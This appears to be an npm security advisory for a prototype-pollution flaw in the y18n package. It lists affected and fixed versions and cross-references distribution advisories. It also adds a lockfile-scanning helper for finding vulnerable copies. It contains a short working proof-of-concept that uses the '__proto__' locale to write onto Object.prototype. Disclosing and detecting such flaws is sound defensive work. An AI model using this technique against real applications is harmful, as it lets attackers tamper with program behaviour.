[NPM:GHSA-C4W7-XM78-47VH] Prototype Pollution in y18n
Severity: High
Affected Packages: 3
Fixed Packages: 3
CVEs: 1
Overview
The npm package y18n before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution.
POC
```js
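const y18n = require('y18n')();
// Select '__proto__' as the locale name.
y18n.setLocale('__proto__');
// On affected versions this update is written onto Object.prototype.
y18n.updateLocale({polluted: true});
// Every object, including the global object, now inherits the property.
console.log(polluted); // true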
```
Recommendation
Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later.
Package | Affected Version |
---|---|
pkg:npm/y18n | >= 5.0.0, < 5.0.5 |
pkg:npm/y18n | = 4.0.0 |
pkg:npm/y18n | < 3.2.2 |
Package | Fixed Version |
---|---|
pkg:npm/y18n | = 5.0.5 |
pkg:npm/y18n | = 4.0.1 |
pkg:npm/y18n | = 3.2.2 |
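The ranges above can be checked against a project's lockfile, including nested copies that arrive as transitive dependencies. This is an added example, not code from the advisory or from y18n; the function names and `sampleLock` are constructed for illustration, and it assumes the npm `package-lock.json` layout (a flat `packages` map in lockfileVersion 2/3, a nested `dependencies` tree in version 1) and version components below 1000.

```javascript
// Added example, not the advisory's code: flag affected y18n in a lockfile.
// Turn "x.y.z" into one comparable number; suffixes like "-beta" are ignored.
function versionKey(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(String(v));
  return m ? Number(m[1]) * 1e6 + Number(m[2]) * 1e3 + Number(m[3]) : null;
}

// Ranges from the advisory: < 3.2.2, = 4.0.0, >= 5.0.0 and < 5.0.5.
function isAffected(version) {
  const k = versionKey(version);
  if (k === null) return true; // unparseable (e.g. a git URL): review by hand
  return k < 3002002 || k === 4000000 || (k >= 5000000 && k < 5000005);
}

function findAffectedY18n(lock) {
  const hits = [];
  const check = (path, meta) => {
    if (isAffected(meta.version)) hits.push({ path, version: meta.version });
  };
  if (lock.packages) {
    // lockfileVersion 2/3: flat map keyed by install path.
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (/(^|\/)node_modules\/y18n$/.test(path)) check(path, meta);
    }
  } else {
    // lockfileVersion 1: nested "dependencies" tree.
    (function walk(deps, prefix) {
      for (const [name, meta] of Object.entries(deps || {})) {
        const path = prefix + 'node_modules/' + name;
        if (name === 'y18n') check(path, meta);
        walk(meta.dependencies, path + '/');
      }
    })(lock.dependencies, '');
  }
  return hits;
}

// Constructed sample lockfile (lockfileVersion 2 layout), not real project data.
const sampleLock = {
  lockfileVersion: 2,
  packages: {
    '': { name: 'demo', version: '1.0.0' },
    'node_modules/y18n': { version: '5.0.5' },
    'node_modules/yargs/node_modules/y18n': { version: '4.0.0' },
    'node_modules/old-cli/node_modules/y18n': { version: '3.2.1' },
  },
};
console.log(findAffectedY18n(sampleLock));
```

In a real project, pass `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))` instead of `sampleLock`; every path reported needs its parent dependency updated or an override to a fixed version.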
- ID: NPM:GHSA-C4W7-XM78-47VH
- Severity: high
- URL: https://github.com/advisories/GHSA-c4w7-xm78-47vh
- Published: 2021-03-29T16:05:12 (3 years ago)
- Modified: 2023-11-29T22:45:30 (9 months ago)
- Rights: NPM Security Team
- Other Advisories:
- ALPINE:CVE-2020-7774
- ALSA-2020:5499
- ALSA-2021:0548
- ALSA-2021:0551
- ELSA-2020-5499
- ELSA-2021-0548
- ELSA-2021-0551
- FREEBSD:C0C1834C-9761-11EB-ACFD-0022489AD614
- GLSA-202405-29
- openSUSE-SU-2021:1059-1
- openSUSE-SU-2021:1060-1
- openSUSE-SU-2021:1061-1
- openSUSE-SU-2021:1113-1
- openSUSE-SU-2021:2327-1
- openSUSE-SU-2021:2353-1
- openSUSE-SU-2021:2354-1
- openSUSE-SU-2021:2618-1
- RHSA-2020:5499
- RHSA-2021:0548
- RHSA-2021:0551
- RLSA-2020:5499
- RLSA-2021:0548
- RLSA-2021:0551
- SUSE-SU-2021:2319-1
- SUSE-SU-2021:2323-1
- SUSE-SU-2021:2326-1
- SUSE-SU-2021:2327-1
- SUSE-SU-2021:2353-1
- SUSE-SU-2021:2354-1
- SUSE-SU-2021:2618-1
- SUSE-SU-2021:2620-1
Type | Package URL | Namespace | Name / Product | Version | Distribution / Platform | Arch | Patch / Fix |
---|---|---|---|---|---|---|---|
Affected | pkg:npm/y18n | | y18n | >= 5.0.0 < 5.0.5 | | | |
Fixed | pkg:npm/y18n | | y18n | = 5.0.5 | | | |
Affected | pkg:npm/y18n | | y18n | = 4.0.0 | | | |
Fixed | pkg:npm/y18n | | y18n | = 4.0.1 | | | |
Affected | pkg:npm/y18n | | y18n | < 3.2.2 | | | |
Fixed | pkg:npm/y18n | | y18n | = 3.2.2 | | | |